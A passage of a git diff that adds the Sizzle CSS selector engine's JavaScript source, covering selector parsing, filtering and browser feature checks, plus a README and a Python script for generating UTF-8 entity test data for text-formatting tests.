= m[3]; + + parts.push( m[1] ); + + if ( m[2] ) { + extra = m[3]; + break; + } + } + } while ( m ); + + if ( parts.length > 1 && origPOS.exec( selector ) ) { + + if ( parts.length === 2 && Expr.relative[ parts[0] ] ) { + set = posProcess( parts[0] + parts[1], context, seed ); + + } else { + set = Expr.relative[ parts[0] ] ? + [ context ] : + Sizzle( parts.shift(), context ); + + while ( parts.length ) { + selector = parts.shift(); + + if ( Expr.relative[ selector ] ) { + selector += parts.shift(); + } + + set = posProcess( selector, set, seed ); + } + } + + } else { + // Take a shortcut and set the context if the root selector is an ID + // (but not if it'll be faster if the inner selector is an ID) + if ( !seed && parts.length > 1 && context.nodeType === 9 && !contextXML && + Expr.match.ID.test(parts[0]) && !Expr.match.ID.test(parts[parts.length - 1]) ) { + + ret = Sizzle.find( parts.shift(), context, contextXML ); + context = ret.expr ? + Sizzle.filter( ret.expr, ret.set )[0] : + ret.set[0]; + } + + if ( context ) { + ret = seed ? + { expr: parts.pop(), set: makeArray(seed) } : + Sizzle.find( parts.pop(), parts.length === 1 && (parts[0] === "~" || parts[0] === "+") && context.parentNode ? context.parentNode : context, contextXML ); + + set = ret.expr ? + Sizzle.filter( ret.expr, ret.set ) : + ret.set; + + if ( parts.length > 0 ) { + checkSet = makeArray( set ); + + } else { + prune = false; + } + + while ( parts.length ) { + cur = parts.pop(); + pop = cur; + + if ( !Expr.relative[ cur ] ) { + cur = ""; + } else { + pop = parts.pop(); + } + + if ( pop == null ) { + pop = context; + } + + Expr.relative[ cur ]( checkSet, pop, contextXML ); + } + + } else { + checkSet = parts = []; + } + } + + if ( !checkSet ) { + checkSet = set; + } + + if ( !checkSet ) { + Sizzle.error( cur || selector ); + } + + if ( toString.call(checkSet) === "[object Array]" ) { + if ( !prune ) { + results.push.apply( results, checkSet ); + + } else if ( context && context.nodeType === 1 ) { + for ( i = 0; checkSet[i] != null; i++ ) { + if ( checkSet[i] && (checkSet[i] === true || checkSet[i].nodeType === 1 && Sizzle.contains(context, checkSet[i])) ) { + results.push( set[i] ); + } + } + + } else { + for ( i = 0; checkSet[i] != null; i++ ) { + if ( checkSet[i] && checkSet[i].nodeType === 1 ) { + results.push( set[i] ); + } + } + } + + } else { + makeArray( checkSet, results ); + } + + if ( extra ) { + Sizzle( extra, origContext, results, seed ); + Sizzle.uniqueSort( results ); + } + + return results; +}; + +Sizzle.uniqueSort = function( results ) { + if ( sortOrder ) { + hasDuplicate = baseHasDuplicate; + results.sort( sortOrder ); + + if ( hasDuplicate ) { + for ( var i = 1; i < results.length; i++ ) { + if ( results[i] === results[ i - 1 ] ) { + results.splice( i--, 1 ); + } + } + } + } + + return results; +}; + +Sizzle.matches = function( expr, set ) { + return Sizzle( expr, null, null, set ); +}; + +Sizzle.matchesSelector = function( node, expr ) { + return Sizzle( expr, null, null, [node] ).length > 0; +}; + +Sizzle.find = function( expr, context, isXML ) { + var set, i, len, match, type, left; + + if ( !expr ) { + return []; + } + + for ( i = 0, len = Expr.order.length; i < len; i++ ) { + type = Expr.order[i]; + + if ( (match = Expr.leftMatch[ type ].exec( expr )) ) { + left = match[1]; + match.splice( 1, 1 ); + + if ( left.substr( left.length - 1 ) !== "\\" ) { + match[1] = (match[1] || "").replace( rBackslash, "" ); + set = Expr.find[ type ]( match, context, isXML ); + + if ( set != null ) { + expr = expr.replace( Expr.match[ type ], "" ); + break; + } + } + } + } + + if ( !set ) { + set = typeof context.getElementsByTagName !== "undefined" ? + context.getElementsByTagName( "*" ) : + []; + } + + return { set: set, expr: expr }; +}; + +Sizzle.filter = function( expr, set, inplace, not ) { + var match, anyFound, + type, found, item, filter, left, + i, pass, + old = expr, + result = [], + curLoop = set, + isXMLFilter = set && set[0] && Sizzle.isXML( set[0] ); + + while ( expr && set.length ) { + for ( type in Expr.filter ) { + if ( (match = Expr.leftMatch[ type ].exec( expr )) != null && match[2] ) { + filter = Expr.filter[ type ]; + left = match[1]; + + anyFound = false; + + match.splice(1,1); + + if ( left.substr( left.length - 1 ) === "\\" ) { + continue; + } + + if ( curLoop === result ) { + result = []; + } + + if ( Expr.preFilter[ type ] ) { + match = Expr.preFilter[ type ]( match, curLoop, inplace, result, not, isXMLFilter ); + + if ( !match ) { + anyFound = found = true; + + } else if ( match === true ) { + continue; + } + } + + if ( match ) { + for ( i = 0; (item = curLoop[i]) != null; i++ ) { + if ( item ) { + found = filter( item, match, i, curLoop ); + pass = not ^ found; + + if ( inplace && found != null ) { + if ( pass ) { + anyFound = true; + + } else { + curLoop[i] = false; + } + + } else if ( pass ) { + result.push( item ); + anyFound = true; + } + } + } + } + + if ( found !== undefined ) { + if ( !inplace ) { + curLoop = result; + } + + expr = expr.replace( Expr.match[ type ], "" ); + + if ( !anyFound ) { + return []; + } + + break; + } + } + } + + // Improper expression + if ( expr === old ) { + if ( anyFound == null ) { + Sizzle.error( expr ); + + } else { + break; + } + } + + old = expr; + } + + return curLoop; +}; + +Sizzle.error = function( msg ) { + throw new Error( "Syntax error, unrecognized expression: " + msg ); +}; + +/** + * Utility function for retreiving the text value of an array of DOM nodes + * @param {Array|Element} elem + */ +var getText = Sizzle.getText = function( elem ) { + var i, node, + nodeType = elem.nodeType, + ret = ""; + + if ( nodeType ) { + if ( nodeType === 1 || nodeType === 9 || nodeType === 11 ) { + // Use textContent || innerText for elements + if ( typeof elem.textContent === 'string' ) { + return elem.textContent; + } else if ( typeof elem.innerText === 'string' ) { + // Replace IE's carriage returns + return elem.innerText.replace( rReturn, '' ); + } else { + // Traverse it's children + for ( elem = elem.firstChild; elem; elem = elem.nextSibling) { + ret += getText( elem ); + } + } + } else if ( nodeType === 3 || nodeType === 4 ) { + return elem.nodeValue; + } + } else { + + // If no nodeType, this is expected to be an array + for ( i = 0; (node = elem[i]); i++ ) { + // Do not traverse comment nodes + if ( node.nodeType !== 8 ) { + ret += getText( node ); + } + } + } + return ret; +}; + +var Expr = Sizzle.selectors = { + order: [ "ID", "NAME", "TAG" ], + + match: { + ID: /#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/, + CLASS: /\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/, + NAME: /\[name=['"]*((?:[\w\u00c0-\uFFFF\-]|\\.)+)['"]*\]/, + ATTR: /\[\s*((?:[\w\u00c0-\uFFFF\-]|\\.)+)\s*(?:(\S?=)\s*(?:(['"])(.*?)\3|(#?(?:[\w\u00c0-\uFFFF\-]|\\.)*)|)|)\s*\]/, + TAG: /^((?:[\w\u00c0-\uFFFF\*\-]|\\.)+)/, + CHILD: /:(only|nth|last|first)-child(?:\(\s*(even|odd|(?:[+\-]?\d+|(?:[+\-]?\d*)?n\s*(?:[+\-]\s*\d+)?))\s*\))?/, + POS: /:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^\-]|$)/, + PSEUDO: /:((?:[\w\u00c0-\uFFFF\-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/ + }, + + leftMatch: {}, + + attrMap: { + "class": "className", + "for": "htmlFor" + }, + + attrHandle: { + href: function( elem ) { + return elem.getAttribute( "href" ); + }, + type: function( elem ) { + return elem.getAttribute( "type" ); + } + }, + + relative: { + "+": function(checkSet, part){ + var isPartStr = typeof part === "string", + isTag = isPartStr && !rNonWord.test( part ), + isPartStrNotTag = isPartStr && !isTag; + + if ( isTag ) { + part = part.toLowerCase(); + } + + for ( var i = 0, l = checkSet.length, elem; i < l; i++ ) { + if ( (elem = checkSet[i]) ) { + while ( (elem = elem.previousSibling) && elem.nodeType !== 1 ) {} + + checkSet[i] = isPartStrNotTag || elem && elem.nodeName.toLowerCase() === part ? + elem || false : + elem === part; + } + } + + if ( isPartStrNotTag ) { + Sizzle.filter( part, checkSet, true ); + } + }, + + ">": function( checkSet, part ) { + var elem, + isPartStr = typeof part === "string", + i = 0, + l = checkSet.length; + + if ( isPartStr && !rNonWord.test( part ) ) { + part = part.toLowerCase(); + + for ( ; i < l; i++ ) { + elem = checkSet[i]; + + if ( elem ) { + var parent = elem.parentNode; + checkSet[i] = parent.nodeName.toLowerCase() === part ? parent : false; + } + } + + } else { + for ( ; i < l; i++ ) { + elem = checkSet[i]; + + if ( elem ) { + checkSet[i] = isPartStr ? + elem.parentNode : + elem.parentNode === part; + } + } + + if ( isPartStr ) { + Sizzle.filter( part, checkSet, true ); + } + } + }, + + "": function(checkSet, part, isXML){ + var nodeCheck, + doneName = done++, + checkFn = dirCheck; + + if ( typeof part === "string" && !rNonWord.test( part ) ) { + part = part.toLowerCase(); + nodeCheck = part; + checkFn = dirNodeCheck; + } + + checkFn( "parentNode", part, doneName, checkSet, nodeCheck, isXML ); + }, + + "~": function( checkSet, part, isXML ) { + var nodeCheck, + doneName = done++, + checkFn = dirCheck; + + if ( typeof part === "string" && !rNonWord.test( part ) ) { + part = part.toLowerCase(); + nodeCheck = part; + checkFn = dirNodeCheck; + } + + checkFn( "previousSibling", part, doneName, checkSet, nodeCheck, isXML ); + } + }, + + find: { + ID: function( match, context, isXML ) { + if ( typeof context.getElementById !== "undefined" && !isXML ) { + var m = context.getElementById(match[1]); + // Check parentNode to catch when Blackberry 4.6 returns + // nodes that are no longer in the document #6963 + return m && m.parentNode ? [m] : []; + } + }, + + NAME: function( match, context ) { + if ( typeof context.getElementsByName !== "undefined" ) { + var ret = [], + results = context.getElementsByName( match[1] ); + + for ( var i = 0, l = results.length; i < l; i++ ) { + if ( results[i].getAttribute("name") === match[1] ) { + ret.push( results[i] ); + } + } + + return ret.length === 0 ? null : ret; + } + }, + + TAG: function( match, context ) { + if ( typeof context.getElementsByTagName !== "undefined" ) { + return context.getElementsByTagName( match[1] ); + } + } + }, + preFilter: { + CLASS: function( match, curLoop, inplace, result, not, isXML ) { + match = " " + match[1].replace( rBackslash, "" ) + " "; + + if ( isXML ) { + return match; + } + + for ( var i = 0, elem; (elem = curLoop[i]) != null; i++ ) { + if ( elem ) { + if ( not ^ (elem.className && (" " + elem.className + " ").replace(/[\t\n\r]/g, " ").indexOf(match) >= 0) ) { + if ( !inplace ) { + result.push( elem ); + } + + } else if ( inplace ) { + curLoop[i] = false; + } + } + } + + return false; + }, + + ID: function( match ) { + return match[1].replace( rBackslash, "" ); + }, + + TAG: function( match, curLoop ) { + return match[1].replace( rBackslash, "" ).toLowerCase(); + }, + + CHILD: function( match ) { + if ( match[1] === "nth" ) { + if ( !match[2] ) { + Sizzle.error( match[0] ); + } + + match[2] = match[2].replace(/^\+|\s*/g, ''); + + // parse equations like 'even', 'odd', '5', '2n', '3n+2', '4n-1', '-n+6' + var test = /(-?)(\d*)(?:n([+\-]?\d*))?/.exec( + match[2] === "even" && "2n" || match[2] === "odd" && "2n+1" || + !/\D/.test( match[2] ) && "0n+" + match[2] || match[2]); + + // calculate the numbers (first)n+(last) including if they are negative + match[2] = (test[1] + (test[2] || 1)) - 0; + match[3] = test[3] - 0; + } + else if ( match[2] ) { + Sizzle.error( match[0] ); + } + + // TODO: Move to normal caching system + match[0] = done++; + + return match; + }, + + ATTR: function( match, curLoop, inplace, result, not, isXML ) { + var name = match[1] = match[1].replace( rBackslash, "" ); + + if ( !isXML && Expr.attrMap[name] ) { + match[1] = Expr.attrMap[name]; + } + + // Handle if an un-quoted value was used + match[4] = ( match[4] || match[5] || "" ).replace( rBackslash, "" ); + + if ( match[2] === "~=" ) { + match[4] = " " + match[4] + " "; + } + + return match; + }, + + PSEUDO: function( match, curLoop, inplace, result, not ) { + if ( match[1] === "not" ) { + // If we're dealing with a complex expression, or a simple one + if ( ( chunker.exec(match[3]) || "" ).length > 1 || /^\w/.test(match[3]) ) { + match[3] = Sizzle(match[3], null, null, curLoop); + + } else { + var ret = Sizzle.filter(match[3], curLoop, inplace, true ^ not); + + if ( !inplace ) { + result.push.apply( result, ret ); + } + + return false; + } + + } else if ( Expr.match.POS.test( match[0] ) || Expr.match.CHILD.test( match[0] ) ) { + return true; + } + + return match; + }, + + POS: function( match ) { + match.unshift( true ); + + return match; + } + }, + + filters: { + enabled: function( elem ) { + return elem.disabled === false && elem.type !== "hidden"; + }, + + disabled: function( elem ) { + return elem.disabled === true; + }, + + checked: function( elem ) { + return elem.checked === true; + }, + + selected: function( elem ) { + // Accessing this property makes selected-by-default + // options in Safari work properly + if ( elem.parentNode ) { + elem.parentNode.selectedIndex; + } + + return elem.selected === true; + }, + + parent: function( elem ) { + return !!elem.firstChild; + }, + + empty: function( elem ) { + return !elem.firstChild; + }, + + has: function( elem, i, match ) { + return !!Sizzle( match[3], elem ).length; + }, + + header: function( elem ) { + return (/h\d/i).test( elem.nodeName ); + }, + + text: function( elem ) { + var attr = elem.getAttribute( "type" ), type = elem.type; + // IE6 and 7 will map elem.type to 'text' for new HTML5 types (search, etc) + // use getAttribute instead to test this case + return elem.nodeName.toLowerCase() === "input" && "text" === type && ( attr === type || attr === null ); + }, + + radio: function( elem ) { + return elem.nodeName.toLowerCase() === "input" && "radio" === elem.type; + }, + + checkbox: function( elem ) { + return elem.nodeName.toLowerCase() === "input" && "checkbox" === elem.type; + }, + + file: function( elem ) { + return elem.nodeName.toLowerCase() === "input" && "file" === elem.type; + }, + + password: function( elem ) { + return elem.nodeName.toLowerCase() === "input" && "password" === elem.type; + }, + + submit: function( elem ) { + var name = elem.nodeName.toLowerCase(); + return (name === "input" || name === "button") && "submit" === elem.type; + }, + + image: function( elem ) { + return elem.nodeName.toLowerCase() === "input" && "image" === elem.type; + }, + + reset: function( elem ) { + var name = elem.nodeName.toLowerCase(); + return (name === "input" || name === "button") && "reset" === elem.type; + }, + + button: function( elem ) { + var name = elem.nodeName.toLowerCase(); + return name === "input" && "button" === elem.type || name === "button"; + }, + + input: function( elem ) { + return (/input|select|textarea|button/i).test( elem.nodeName ); + }, + + focus: function( elem ) { + return elem === elem.ownerDocument.activeElement; + } + }, + setFilters: { + first: function( elem, i ) { + return i === 0; + }, + + last: function( elem, i, match, array ) { + return i === array.length - 1; + }, + + even: function( elem, i ) { + return i % 2 === 0; + }, + + odd: function( elem, i ) { + return i % 2 === 1; + }, + + lt: function( elem, i, match ) { + return i < match[3] - 0; + }, + + gt: function( elem, i, match ) { + return i > match[3] - 0; + }, + + nth: function( elem, i, match ) { + return match[3] - 0 === i; + }, + + eq: function( elem, i, match ) { + return match[3] - 0 === i; + } + }, + filter: { + PSEUDO: function( elem, match, i, array ) { + var name = match[1], + filter = Expr.filters[ name ]; + + if ( filter ) { + return filter( elem, i, match, array ); + + } else if ( name === "contains" ) { + return (elem.textContent || elem.innerText || getText([ elem ]) || "").indexOf(match[3]) >= 0; + + } else if ( name === "not" ) { + var not = match[3]; + + for ( var j = 0, l = not.length; j < l; j++ ) { + if ( not[j] === elem ) { + return false; + } + } + + return true; + + } else { + Sizzle.error( name ); + } + }, + + CHILD: function( elem, match ) { + var first, last, + doneName, parent, cache, + count, diff, + type = match[1], + node = elem; + + switch ( type ) { + case "only": + case "first": + while ( (node = node.previousSibling) ) { + if ( node.nodeType === 1 ) { + return false; + } + } + + if ( type === "first" ) { + return true; + } + + node = elem; + + /* falls through */ + case "last": + while ( (node = node.nextSibling) ) { + if ( node.nodeType === 1 ) { + return false; + } + } + + return true; + + case "nth": + first = match[2]; + last = match[3]; + + if ( first === 1 && last === 0 ) { + return true; + } + + doneName = match[0]; + parent = elem.parentNode; + + if ( parent && (parent[ expando ] !== doneName || !elem.nodeIndex) ) { + count = 0; + + for ( node = parent.firstChild; node; node = node.nextSibling ) { + if ( node.nodeType === 1 ) { + node.nodeIndex = ++count; + } + } + + parent[ expando ] = doneName; + } + + diff = elem.nodeIndex - last; + + if ( first === 0 ) { + return diff === 0; + + } else { + return ( diff % first === 0 && diff / first >= 0 ); + } + } + }, + + ID: function( elem, match ) { + return elem.nodeType === 1 && elem.getAttribute("id") === match; + }, + + TAG: function( elem, match ) { + return (match === "*" && elem.nodeType === 1) || !!elem.nodeName && elem.nodeName.toLowerCase() === match; + }, + + CLASS: function( elem, match ) { + return (" " + (elem.className || elem.getAttribute("class")) + " ") + .indexOf( match ) > -1; + }, + + ATTR: function( elem, match ) { + var name = match[1], + result = Sizzle.attr ? + Sizzle.attr( elem, name ) : + Expr.attrHandle[ name ] ? + Expr.attrHandle[ name ]( elem ) : + elem[ name ] != null ? + elem[ name ] : + elem.getAttribute( name ), + value = result + "", + type = match[2], + check = match[4]; + + return result == null ? + type === "!=" : + !type && Sizzle.attr ? + result != null : + type === "=" ? + value === check : + type === "*=" ? + value.indexOf(check) >= 0 : + type === "~=" ? + (" " + value + " ").indexOf(check) >= 0 : + !check ? + value && result !== false : + type === "!=" ? + value !== check : + type === "^=" ? + value.indexOf(check) === 0 : + type === "$=" ? + value.substr(value.length - check.length) === check : + type === "|=" ? + value === check || value.substr(0, check.length + 1) === check + "-" : + false; + }, + + POS: function( elem, match, i, array ) { + var name = match[2], + filter = Expr.setFilters[ name ]; + + if ( filter ) { + return filter( elem, i, match, array ); + } + } + } +}; + +var origPOS = Expr.match.POS, + fescape = function(all, num){ + return "\\" + (num - 0 + 1); + }; + +for ( var type in Expr.match ) { + Expr.match[ type ] = new RegExp( Expr.match[ type ].source + (/(?![^\[]*\])(?![^\(]*\))/.source) ); + Expr.leftMatch[ type ] = new RegExp( /(^(?:.|\r|\n)*?)/.source + Expr.match[ type ].source.replace(/\\(\d+)/g, fescape) ); +} +// Expose origPOS +// "global" as in regardless of relation to brackets/parens +Expr.match.globalPOS = origPOS; + +var makeArray = function( array, results ) { + array = Array.prototype.slice.call( array, 0 ); + + if ( results ) { + results.push.apply( results, array ); + return results; + } + + return array; +}; + +// Perform a simple check to determine if the browser is capable of +// converting a NodeList to an array using builtin methods. +// Also verifies that the returned array holds DOM nodes +// (which is not the case in the Blackberry browser) +try { + Array.prototype.slice.call( document.documentElement.childNodes, 0 )[0].nodeType; + +// Provide a fallback method if it does not work +} catch( e ) { + makeArray = function( array, results ) { + var i = 0, + ret = results || []; + + if ( toString.call(array) === "[object Array]" ) { + Array.prototype.push.apply( ret, array ); + + } else { + if ( typeof array.length === "number" ) { + for ( var l = array.length; i < l; i++ ) { + ret.push( array[i] ); + } + + } else { + for ( ; array[i]; i++ ) { + ret.push( array[i] ); + } + } + } + + return ret; + }; +} + +var sortOrder, siblingCheck; + +if ( document.documentElement.compareDocumentPosition ) { + sortOrder = function( a, b ) { + if ( a === b ) { + hasDuplicate = true; + return 0; + } + + if ( !a.compareDocumentPosition || !b.compareDocumentPosition ) { + return a.compareDocumentPosition ? -1 : 1; + } + + return a.compareDocumentPosition(b) & 4 ? -1 : 1; + }; + +} else { + sortOrder = function( a, b ) { + // The nodes are identical, we can exit early + if ( a === b ) { + hasDuplicate = true; + return 0; + + // Fallback to using sourceIndex (in IE) if it's available on both nodes + } else if ( a.sourceIndex && b.sourceIndex ) { + return a.sourceIndex - b.sourceIndex; + } + + var al, bl, + ap = [], + bp = [], + aup = a.parentNode, + bup = b.parentNode, + cur = aup; + + // If the nodes are siblings (or identical) we can do a quick check + if ( aup === bup ) { + return siblingCheck( a, b ); + + // If no parents were found then the nodes are disconnected + } else if ( !aup ) { + return -1; + + } else if ( !bup ) { + return 1; + } + + // Otherwise they're somewhere else in the tree so we need + // to build up a full list of the parentNodes for comparison + while ( cur ) { + ap.unshift( cur ); + cur = cur.parentNode; + } + + cur = bup; + + while ( cur ) { + bp.unshift( cur ); + cur = cur.parentNode; + } + + al = ap.length; + bl = bp.length; + + // Start walking down the tree looking for a discrepancy + for ( var i = 0; i < al && i < bl; i++ ) { + if ( ap[i] !== bp[i] ) { + return siblingCheck( ap[i], bp[i] ); + } + } + + // We ended someplace up the tree so do a sibling check + return i === al ? + siblingCheck( a, bp[i], -1 ) : + siblingCheck( ap[i], b, 1 ); + }; + + siblingCheck = function( a, b, ret ) { + if ( a === b ) { + return ret; + } + + var cur = a.nextSibling; + + while ( cur ) { + if ( cur === b ) { + return -1; + } + + cur = cur.nextSibling; + } + + return 1; + }; +} + +// Check to see if the browser returns elements by name when +// querying by getElementById (and provide a workaround) +(function(){ + // We're going to inject a fake input element with a specified name + var form = document.createElement("div"), + id = "script" + (new Date()).getTime(), + root = document.documentElement; + + form.innerHTML = ""; + + // Inject it into the root element, check its status, and remove it quickly + root.insertBefore( form, root.firstChild ); + + // The workaround has to do additional checks after a getElementById + // Which slows things down for other browsers (hence the branching) + if ( document.getElementById( id ) ) { + Expr.find.ID = function( match, context, isXML ) { + if ( typeof context.getElementById !== "undefined" && !isXML ) { + var m = context.getElementById(match[1]); + + return m ? + m.id === match[1] || typeof m.getAttributeNode !== "undefined" && m.getAttributeNode("id").nodeValue === match[1] ? + [m] : + undefined : + []; + } + }; + + Expr.filter.ID = function( elem, match ) { + var node = typeof elem.getAttributeNode !== "undefined" && elem.getAttributeNode("id"); + + return elem.nodeType === 1 && node && node.nodeValue === match; + }; + } + + root.removeChild( form ); + + // release memory in IE + root = form = null; +})(); + +(function(){ + // Check to see if the browser returns only elements + // when doing getElementsByTagName("*") + + // Create a fake element + var div = document.createElement("div"); + div.appendChild( document.createComment("") ); + + // Make sure no comments are found + if ( div.getElementsByTagName("*").length > 0 ) { + Expr.find.TAG = function( match, context ) { + var results = context.getElementsByTagName( match[1] ); + + // Filter out possible comments + if ( match[1] === "*" ) { + var tmp = []; + + for ( var i = 0; results[i]; i++ ) { + if ( results[i].nodeType === 1 ) { + tmp.push( results[i] ); + } + } + + results = tmp; + } + + return results; + }; + } + + // Check to see if an attribute returns normalized href attributes + div.innerHTML = ""; + + if ( div.firstChild && typeof div.firstChild.getAttribute !== "undefined" && + div.firstChild.getAttribute("href") !== "#" ) { + + Expr.attrHandle.href = function( elem ) { + return elem.getAttribute( "href", 2 ); + }; + } + + // release memory in IE + div = null; +})(); + +if ( document.querySelectorAll ) { + (function(){ + var oldSizzle = Sizzle, + div = document.createElement("div"), + id = "__sizzle__"; + + div.innerHTML = "

"; + + // Safari can't handle uppercase or unicode characters when + // in quirks mode. + if ( div.querySelectorAll && div.querySelectorAll(".TEST").length === 0 ) { + return; + } + + Sizzle = function( query, context, extra, seed ) { + context = context || document; + + // Only use querySelectorAll on non-XML documents + // (ID selectors don't work in non-HTML documents) + if ( !seed && !Sizzle.isXML(context) ) { + // See if we find a selector to speed up + var match = /^(\w+$)|^\.([\w\-]+$)|^#([\w\-]+$)/.exec( query ); + + if ( match && (context.nodeType === 1 || context.nodeType === 9) ) { + // Speed-up: Sizzle("TAG") + if ( match[1] ) { + return makeArray( context.getElementsByTagName( query ), extra ); + + // Speed-up: Sizzle(".CLASS") + } else if ( match[2] && Expr.find.CLASS && context.getElementsByClassName ) { + return makeArray( context.getElementsByClassName( match[2] ), extra ); + } + } + + if ( context.nodeType === 9 ) { + // Speed-up: Sizzle("body") + // The body element only exists once, optimize finding it + if ( query === "body" && context.body ) { + return makeArray( [ context.body ], extra ); + + // Speed-up: Sizzle("#ID") + } else if ( match && match[3] ) { + var elem = context.getElementById( match[3] ); + + // Check parentNode to catch when Blackberry 4.6 returns + // nodes that are no longer in the document #6963 + if ( elem && elem.parentNode ) { + // Handle the case where IE and Opera return items + // by name instead of ID + if ( elem.id === match[3] ) { + return makeArray( [ elem ], extra ); + } + + } else { + return makeArray( [], extra ); + } + } + + try { + return makeArray( context.querySelectorAll(query), extra ); + } catch(qsaError) {} + + // qSA works strangely on Element-rooted queries + // We can work around this by specifying an extra ID on the root + // and working up from there (Thanks to Andrew Dupont for the technique) + // IE 8 doesn't work on object elements + } else if ( context.nodeType === 1 && context.nodeName.toLowerCase() !== "object" ) { + var oldContext = context, + old = context.getAttribute( "id" ), + nid = old || id, + hasParent = context.parentNode, + relativeHierarchySelector = /^\s*[+~]/.test( query ); + + if ( !old ) { + context.setAttribute( "id", nid ); + } else { + nid = nid.replace( /'/g, "\\$&" ); + } + if ( relativeHierarchySelector && hasParent ) { + context = context.parentNode; + } + + try { + if ( !relativeHierarchySelector || hasParent ) { + return makeArray( context.querySelectorAll( "[id='" + nid + "'] " + query ), extra ); + } + + } catch(pseudoError) { + } finally { + if ( !old ) { + oldContext.removeAttribute( "id" ); + } + } + } + } + + return oldSizzle(query, context, extra, seed); + }; + + for ( var prop in oldSizzle ) { + Sizzle[ prop ] = oldSizzle[ prop ]; + } + + // release memory in IE + div = null; + })(); +} + +(function(){ + var html = document.documentElement, + matches = html.matchesSelector || html.mozMatchesSelector || html.webkitMatchesSelector || html.msMatchesSelector; + + if ( matches ) { + // Check to see if it's possible to do matchesSelector + // on a disconnected node (IE 9 fails this) + var disconnectedMatch = !matches.call( document.createElement( "div" ), "div" ), + pseudoWorks = false; + + try { + // This should fail with an exception + // Gecko does not error, returns false instead + matches.call( document.documentElement, "[test!='']:sizzle" ); + + } catch( pseudoError ) { + pseudoWorks = true; + } + + Sizzle.matchesSelector = function( node, expr ) { + // Make sure that attribute selectors are quoted + expr = expr.replace(/\=\s*([^'"\]]*)\s*\]/g, "='$1']"); + + if ( !Sizzle.isXML( node ) ) { + try { + if ( pseudoWorks || !Expr.match.PSEUDO.test( expr ) && !/!=/.test( expr ) ) { + var ret = matches.call( node, expr ); + + // IE 9's matchesSelector returns false on disconnected nodes + if ( ret || !disconnectedMatch || + // As well, disconnected nodes are said to be in a document + // fragment in IE 9, so check for that + node.document && node.document.nodeType !== 11 ) { + return ret; + } + } + } catch(e) {} + } + + return Sizzle(expr, null, null, [node]).length > 0; + }; + } +})(); + +(function(){ + var div = document.createElement("div"); + + div.innerHTML = "
"; + + // Opera can't find a second classname (in 9.6) + // Also, make sure that getElementsByClassName actually exists + if ( !div.getElementsByClassName || div.getElementsByClassName("e").length === 0 ) { + return; + } + + // Safari caches class attributes, doesn't catch changes (in 3.2) + div.lastChild.className = "e"; + + if ( div.getElementsByClassName("e").length === 1 ) { + return; + } + + Expr.order.splice(1, 0, "CLASS"); + Expr.find.CLASS = function( match, context, isXML ) { + if ( typeof context.getElementsByClassName !== "undefined" && !isXML ) { + return context.getElementsByClassName(match[1]); + } + }; + + // release memory in IE + div = null; +})(); + +function dirNodeCheck( dir, cur, doneName, checkSet, nodeCheck, isXML ) { + for ( var i = 0, l = checkSet.length; i < l; i++ ) { + var elem = checkSet[i]; + + if ( elem ) { + var match = false; + + elem = elem[dir]; + + while ( elem ) { + if ( elem[ expando ] === doneName ) { + match = checkSet[elem.sizset]; + break; + } + + if ( elem.nodeType === 1 && !isXML ){ + elem[ expando ] = doneName; + elem.sizset = i; + } + + if ( elem.nodeName.toLowerCase() === cur ) { + match = elem; + break; + } + + elem = elem[dir]; + } + + checkSet[i] = match; + } + } +} + +function dirCheck( dir, cur, doneName, checkSet, nodeCheck, isXML ) { + for ( var i = 0, l = checkSet.length; i < l; i++ ) { + var elem = checkSet[i]; + + if ( elem ) { + var match = false; + + elem = elem[dir]; + + while ( elem ) { + if ( elem[ expando ] === doneName ) { + match = checkSet[elem.sizset]; + break; + } + + if ( elem.nodeType === 1 ) { + if ( !isXML ) { + elem[ expando ] = doneName; + elem.sizset = i; + } + + if ( typeof cur !== "string" ) { + if ( elem === cur ) { + match = true; + break; + } + + } else if ( Sizzle.filter( cur, [elem] ).length > 0 ) { + match = elem; + break; + } + } + + elem = elem[dir]; + } + + checkSet[i] = match; + } + } +} + +if ( document.documentElement.contains ) { + Sizzle.contains = function( a, b ) { + return a !== b && (a.contains ? a.contains(b) : true); + }; + +} else if ( document.documentElement.compareDocumentPosition ) { + Sizzle.contains = function( a, b ) { + return !!(a.compareDocumentPosition(b) & 16); + }; + +} else { + Sizzle.contains = function() { + return false; + }; +} + +Sizzle.isXML = function( elem ) { + // documentElement is verified for cases where it doesn't yet exist + // (such as loading iframes in IE - #4833) + var documentElement = (elem ? elem.ownerDocument || elem : 0).documentElement; + + return documentElement ? documentElement.nodeName !== "HTML" : false; +}; + +var posProcess = function( selector, context, seed ) { + var match, + tmpSet = [], + later = "", + root = context.nodeType ? [context] : context; + + // Position selectors must be done after the filter + // And so must :not(positional) so we move all PSEUDOs to the end + while ( (match = Expr.match.PSEUDO.exec( selector )) ) { + later += match[0]; + selector = selector.replace( Expr.match.PSEUDO, "" ); + } + + selector = Expr.relative[selector] ? selector + "*" : selector; + + for ( var i = 0, l = root.length; i < l; i++ ) { + Sizzle( selector, root[i], tmpSet, seed ); + } + + return Sizzle.filter( later, tmpSet ); +}; + +// EXPOSE + +window.Sizzle = Sizzle; + +})(); \ No newline at end of file diff --git a/tests/data/formatting/utf-8/README b/tests/data/formatting/utf-8/README new file mode 100644 index 0000000000..5bc6a317d3 --- /dev/null +++ b/tests/data/formatting/utf-8/README @@ -0,0 +1,15 @@ +The Python scripts are for generating test data, because Python's Unicode +support is much, much, much, much better than PHP's. + + * `utf-8/urlencode.py`, `utf-8/u-urlencode.py` and `utf-8/entitize.py` process UTF-8 + into a few different formats (%-encoding, %u-encoding, &#decimal;) + and are used like normal UNIXy pipes. + + Try: + + `python urlencode.py < utf-8.txt > urlencoded.txt` + `python u-urlencode.py < utf-8.txt > u-urlencoded.txt` + `python entitize.py < utf-8.txt > entitized.txt` + + * `windows-1252.py` converts Windows-only smart-quotes and things + into their unicode &#decimal reference; equivalents. diff --git a/tests/data/formatting/utf-8/entitize.py b/tests/data/formatting/utf-8/entitize.py new file mode 100644 index 0000000000..efa7cb18d5 --- /dev/null +++ b/tests/data/formatting/utf-8/entitize.py @@ -0,0 +1,24 @@ +# Generates entitized.txt from utf-8.txt +# +# entitized.txt is used by Tests_Formatting_UrlEncodedToEntities + +import codecs +import sys + +def entitize(line): + """Convert text to &#[dec]; entities.""" + line = line.strip(); + line = ["&#%d;" % ord(s) for s in line] + return "".join(line) + +if __name__ == "__main__": + args = sys.argv[1:] + if args and args[0] in ("-h", "--help"): + print "Usage: python entitize.py < 